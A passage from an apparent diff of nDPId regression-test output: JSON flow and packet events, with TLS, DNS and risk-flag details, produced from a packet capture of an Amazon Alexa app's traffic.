{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090572,"flow_last_seen":1490976090572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090572,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1490976090572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090572,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8o8xAAEAGcF6sECrYNu8YuoUVAbs6msJ9AAAAAKAC\/\/863gAAAgQFtAQCCAoA9mGxAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1490976090753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090753,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZiVAAOcGBxE27xi6rBAq2AG7hRXpU+crOprCfnASH\/7pEAAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1490976090756,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090756,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoo81AAEAGcHGsECrYNu8YuoUVAbs6msJ+6VPnLFAQAVczggAA"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090572,"flow_last_seen":1490976090757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090757,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1490976090796,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1490976090796,"pkt":"AMDKkaPvePiC0\/vCCABFAABJWlpAAEARM1CsECrYrBAqAYuOADUANbcep0QBAAABAAAAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQAB"} 00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090796,"flow_last_seen":1490976090796,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976090796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1412,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976090572,"flow_last_seen":1490976090959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090959,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1490976090982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1490976090982,"pkt":"ePiC0\/vCAMDKkaPvCABFAAB13VlAAEARsCSsECoBrBAq2AA1i44AYd1op0SBgAABAAIAAAAADXMzLWV4dGVybmFsLTIJYW1hem9uYXdzA2NvbQAAAQABwAwABQABAAAADgAQDXMzLWV4dGVybmFsLTHAGsA5AAEAAQAAAAQABDbnSFg="} 00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976090982,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"s3-external-2.amazonaws.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.231.72.88"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090991,"flow_last_seen":1490976090991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090991,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1490976090991,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090991,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8byFAAEAGdXOsECrYNudIWKNcAbsQFQ76AAAAAKAC\/\/\/K3wAAAgQFtAQCCAoA9mHbAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976091048,"flow_last_seen":1490976091048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976091048,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1490976091048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976091048,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80ahAAEAGEuysECrYNudIWKNdAbtkFLBIAAAAAKAC\/\/\/ViwAAAgQFtAQCCAoA9mHgAAAAAAEDAwg="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1490976091160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0KVkAACcGFEQ250hYrBAq2AG7o1w0YmduEBUO+4AS\/\/+yAwAAAgQFmAMDCAEEAgEB"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1490976091163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091163,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobyJAAEAGdYasECrYNudIWKNcAbsQFQ77NGJnb1AQAVf4XAAA"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1490976091217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091217,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0Sq8AACcG8u0250hYrBAq2AG7o117lZ8zZBSwSYAS\/\/89vAAAAgQFmAMDCAEEAgEB"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1490976091219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo0alAAEAGEv+sECrYNudIWKNdAbtkFLBJe5WfNFAQAVeEFQAA"} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976090991,"flow_last_seen":1490976091345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976091345,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01339{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1456,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976090991,"flow_last_seen":1490976091346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2942,"flow_avg_l4_payload_len":367,"midstream":0,"thread_ts_msec":1490976091346,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090991,"flow_last_seen":1490976090991,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090991,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1490976090991,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090991,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8byFAAEAGdXOsECrYNudIWKNcAbsQFQ76AAAAAKAC\/\/\/K3wAAAgQFtAQCCAoA9mHbAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976091048,"flow_last_seen":1490976091048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976091048,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1490976091048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976091048,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80ahAAEAGEuysECrYNudIWKNdAbtkFLBIAAAAAKAC\/\/\/ViwAAAgQFtAQCCAoA9mHgAAAAAAEDAwg="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1490976091160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0KVkAACcGFEQ250hYrBAq2AG7o1w0YmduEBUO+4AS\/\/+yAwAAAgQFmAMDCAEEAgEB"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1490976091163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976091163,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobyJAAEAGdYasECrYNudIWKNcAbsQFQ77NGJnb1AQAVf4XAAA"} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976090991,"flow_last_seen":1490976091163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976091163,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1490976091217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976091217,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0Sq8AACcG8u0250hYrBAq2AG7o117lZ8zZBSwSYAS\/\/89vAAAAgQFmAMDCAEEAgEB"} 